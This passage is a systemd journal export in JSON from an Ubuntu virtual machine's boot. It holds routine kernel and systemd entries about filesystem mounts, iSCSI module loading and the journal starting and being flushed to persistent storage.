"__REALTIME_TIMESTAMP" : "1615280780014358", "__MONOTONIC_TIMESTAMP" : "5731247", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3908006", "MESSAGE" : "Btrfs loaded, crc32c=crc32c-intel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cd;b=e2b08827b5804427b422c10c84f1567e;m=5773bd;t=5bd16dd1af324;x=967a662793c4f2ca", "__REALTIME_TIMESTAMP" : "1615280780014372", "__MONOTONIC_TIMESTAMP" : "5731261", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "3937225", "MESSAGE" : "random: fast init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ce;b=e2b08827b5804427b422c10c84f1567e;m=5773c9;t=5bd16dd1af330;x=69fd3a294d658dcf", "__REALTIME_TIMESTAMP" : "1615280780014384", "__MONOTONIC_TIMESTAMP" : "5731273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "4003689", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cf;b=e2b08827b5804427b422c10c84f1567e;m=5773d4;t=5bd16dd1af33c;x=fd3648774e170cb5", "__REALTIME_TIMESTAMP" : "1615280780014396", "__MONOTONIC_TIMESTAMP" : "5731284", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", "_SOURCE_MONOTONIC_TIMESTAMP" : "4007486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d0;b=e2b08827b5804427b422c10c84f1567e;m=5773f1;t=5bd16dd1af359;x=e99a633f94b1be11", "__REALTIME_TIMESTAMP" : "1615280780014425", "__MONOTONIC_TIMESTAMP" : "5731313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: wait-for-root: uninitialized urandom read (16 bytes read)", "_SOURCE_MONOTONIC_TIMESTAMP" : "4011196" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d1;b=e2b08827b5804427b422c10c84f1567e;m=577400;t=5bd16dd1af367;x=f558cf2ce7cf1e96", "__REALTIME_TIMESTAMP" : "1615280780014439", "__MONOTONIC_TIMESTAMP" : "5731328", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4095523", "MESSAGE" : "EXT4-fs (vda1): mounted filesystem with ordered data mode. Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d2;b=e2b08827b5804427b422c10c84f1567e;m=57740c;t=5bd16dd1af374;x=9b3dda8076202fc4", "__REALTIME_TIMESTAMP" : "1615280780014452", "__MONOTONIC_TIMESTAMP" : "5731340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4792547", "MESSAGE" : "ip_tables: (C) 2000-2006 Netfilter Core Team" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d3;b=e2b08827b5804427b422c10c84f1567e;m=57741c;t=5bd16dd1af383;x=1cbee677ef6ff7e8", "__REALTIME_TIMESTAMP" : "1615280780014467", "__MONOTONIC_TIMESTAMP" : "5731356", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4828132", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "MESSAGE" : "systemd 237 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d4;b=e2b08827b5804427b422c10c84f1567e;m=57742b;t=5bd16dd1af393;x=61db57ed35ef3db6", "__REALTIME_TIMESTAMP" : "1615280780014483", "__MONOTONIC_TIMESTAMP" : "5731371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4838029", "MESSAGE" : "Detected virtualization kvm." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d5;b=e2b08827b5804427b422c10c84f1567e;m=57743b;t=5bd16dd1af3a3;x=6cad4666b4b66f5a", "__REALTIME_TIMESTAMP" : "1615280780014499", "__MONOTONIC_TIMESTAMP" : "5731387", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4840668", "MESSAGE" : "Detected architecture x86-64." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d6;b=e2b08827b5804427b422c10c84f1567e;m=577448;t=5bd16dd1af3b0;x=7d956334ef22c29d", "__REALTIME_TIMESTAMP" : "1615280780014512", "__MONOTONIC_TIMESTAMP" : "5731400", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4855210", "MESSAGE" : "Set hostname to ." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d7;b=e2b08827b5804427b422c10c84f1567e;m=577455;t=5bd16dd1af3bc;x=cc15926571e6ef3b", "__REALTIME_TIMESTAMP" : "1615280780014524", "__MONOTONIC_TIMESTAMP" : "5731413", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4870328", "MESSAGE" : "Initializing machine ID from KVM UUID." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d8;b=e2b08827b5804427b422c10c84f1567e;m=577461;t=5bd16dd1af3c9;x=601f89e0a8d6d00d", "__REALTIME_TIMESTAMP" : "1615280780014537", "__MONOTONIC_TIMESTAMP" : "5731425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "4874166", "MESSAGE" : "Installed transient /etc/machine-id file." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d9;b=e2b08827b5804427b422c10c84f1567e;m=57746f;t=5bd16dd1af3d6;x=17ecf4b5c6f614fc", "__REALTIME_TIMESTAMP" : "1615280780014550", "__MONOTONIC_TIMESTAMP" : "5731439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5338460", "MESSAGE" : "Reached target Swap." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1da;b=e2b08827b5804427b422c10c84f1567e;m=57747b;t=5bd16dd1af3e3;x=c8c921c7a0c85d5a", "__REALTIME_TIMESTAMP" : "1615280780014563", "__MONOTONIC_TIMESTAMP" : "5731451", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5343107", "MESSAGE" : "Reached target User and Group Name Lookups." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1db;b=e2b08827b5804427b422c10c84f1567e;m=577487;t=5bd16dd1af3ef;x=f8a48c4940b6d242", "__REALTIME_TIMESTAMP" : "1615280780014575", "__MONOTONIC_TIMESTAMP" : "5731463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5349139", "MESSAGE" : "Set up automount Arbitrary Executable File Formats File System Automount Point." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dc;b=e2b08827b5804427b422c10c84f1567e;m=577494;t=5bd16dd1af3fc;x=fc4678ab1b81a329", "__REALTIME_TIMESTAMP" : "1615280780014588", "__MONOTONIC_TIMESTAMP" : "5731476", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "SYSLOG_PID" : "1", "_SOURCE_MONOTONIC_TIMESTAMP" : "5356839", "MESSAGE" : "Created slice User and Session Slice." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1dd;b=e2b08827b5804427b422c10c84f1567e;m=5774a1;t=5bd16dd1af408;x=ae62b745ca058a1c", "__REALTIME_TIMESTAMP" : "1615280780014600", "__MONOTONIC_TIMESTAMP" : "5731489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5488210", "MESSAGE" : "Loading iSCSI transport class v2.0-870." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1de;b=e2b08827b5804427b422c10c84f1567e;m=5774b0;t=5bd16dd1af417;x=e7e376182de3d387", "__REALTIME_TIMESTAMP" : "1615280780014615", "__MONOTONIC_TIMESTAMP" : "5731504", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5499236", "MESSAGE" : "EXT4-fs (vda1): re-mounted. Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1df;b=e2b08827b5804427b422c10c84f1567e;m=5774cb;t=5bd16dd1af432;x=4ecfa34b7065c656", "__REALTIME_TIMESTAMP" : "1615280780014642", "__MONOTONIC_TIMESTAMP" : "5731531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5568633", "MESSAGE" : "iscsi: registered transport (tcp)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e0;b=e2b08827b5804427b422c10c84f1567e;m=5774e5;t=5bd16dd1af44d;x=c88a5b30d8b3d7fc", "__REALTIME_TIMESTAMP" : "1615280780014669", "__MONOTONIC_TIMESTAMP" : "5731557", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5685927", "MESSAGE" : "iscsi: registered transport (iser)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e1;b=e2b08827b5804427b422c10c84f1567e;m=5774fc;t=5bd16dd1af463;x=bb4e6f9bf0d1357c", "__REALTIME_TIMESTAMP" : "1615280780014691", "__MONOTONIC_TIMESTAMP" : "5731580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "MESSAGE_ID" : "f77379a8490b408bbe5f6940505a777b", "MESSAGE" : "Journal started", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e2;b=e2b08827b5804427b422c10c84f1567e;m=579b80;t=5bd16dd1b1ae7;x=708a9f50f5affdb4", "__REALTIME_TIMESTAMP" : "1615280780024551", "__MONOTONIC_TIMESTAMP" : "5741440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "Runtime journal (/run/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 2.4M, max 19.9M, 17.4M free.", "JOURNAL_NAME" : "Runtime journal", "JOURNAL_PATH" : "/run/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "2613248", "CURRENT_USE_PRETTY" : "2.4M", "MAX_USE" : "20905984", "MAX_USE_PRETTY" : "19.9M", "DISK_KEEP_FREE" : "31358976", "DISK_KEEP_FREE_PRETTY" : "29.9M", "DISK_AVAILABLE" : "206270464", "DISK_AVAILABLE_PRETTY" : "196.7M", "LIMIT" : "20905984", "LIMIT_PRETTY" : "19.9M", "AVAILABLE" : "18292736", "AVAILABLE_PRETTY" : "17.4M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e3;b=e2b08827b5804427b422c10c84f1567e;m=57aad6;t=5bd16dd1b2a3e;x=60e7c652e0bd7c0d", "__REALTIME_TIMESTAMP" : "1615280780028478", "__MONOTONIC_TIMESTAMP" : "5745366", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "MESSAGE" : "Inserted module 'iscsi_tcp'", "_TRANSPORT" : "journal", "_PID" : "373", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780028525" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e4;b=e2b08827b5804427b422c10c84f1567e;m=57aed7;t=5bd16dd1b2e3f;x=b97ccb0c58724824", "__REALTIME_TIMESTAMP" : "1615280780029503", "__MONOTONIC_TIMESTAMP" : "5746391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "_TRANSPORT" : "journal", "_PID" : "373", "MESSAGE" : "Inserted module 'ib_iser'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280779979585" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e5;b=e2b08827b5804427b422c10c84f1567e;m=57ced3;t=5bd16dd1b4e3a;x=4b62473704db743c", "__REALTIME_TIMESTAMP" : "1615280780037690", "__MONOTONIC_TIMESTAMP" : "5754579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE" : "Starting Flush Journal to Persistent Storage...", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780029943" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e6;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=1d9ee251b5cd373d", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE" : "Time spent on flushing to /var is 3.314ms for 485 entries." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e7;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=f04395007d153097", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "System journal (/var/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 8.0M, max 200.9M, 192.9M free.", "JOURNAL_NAME" : "System journal", "JOURNAL_PATH" : "/var/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "8388608", "CURRENT_USE_PRETTY" : "8.0M", "MAX_USE" : "210751488", "MAX_USE_PRETTY" : "200.9M", "DISK_KEEP_FREE" : "316125184", "DISK_KEEP_FREE_PRETTY" : "301.4M", "DISK_AVAILABLE" : "1075249152", "DISK_AVAILABLE_PRETTY" : "1.0G", "LIMIT" : "210751488", "LIMIT_PRETTY" : "200.9M", "AVAILABLE" : "202362880", "AVAILABLE_PRETTY" : "192.9M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e8;b=e2b08827b5804427b422c10c84f1567e;m=588647;t=5bd16dd1c05ae;x=85e75afcf7a90cd2", "__REALTIME_TIMESTAMP" : "1615280780084654", "__MONOTONIC_TIMESTAMP" : "5801543", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "MESSAGE" : "Started udev Kernel Device Manager.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "UNIT" : "systemd-udevd.service", "INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780055025" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e9;b=e2b08827b5804427b422c10c84f1567e;m=5887ca;t=5bd16dd1c0731;x=e3fc14ea025d4465", "__REALTIME_TIMESTAMP" : "1615280780085041", "__MONOTONIC_TIMESTAMP" : "5801930", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Apply Kernel Variables.", "UNIT" : "systemd-sysctl.service", "INVOCATION_ID" : "6b6fa8b7e34c4a8a9469dc4e7cc56602", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780061690" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ea;b=e2b08827b5804427b422c10c84f1567e;m=58cff4;t=5bd16dd1c4f5c;x=a385b718ba0d78cb", "__REALTIME_TIMESTAMP" : "1615280780103516", "__MONOTONIC_TIMESTAMP" : "5820404", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Flush Journal to Persistent Storage.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780100979" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1eb;b=e2b08827b5804427b422c10c84f1567e;m=592a7b;t=5bd16dd1ca9e2;x=7bf11fd8fad12c74", "__REALTIME_TIMESTAMP" : "1615280780126690", "__MONOTONIC_TIMESTAMP" : "5843579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 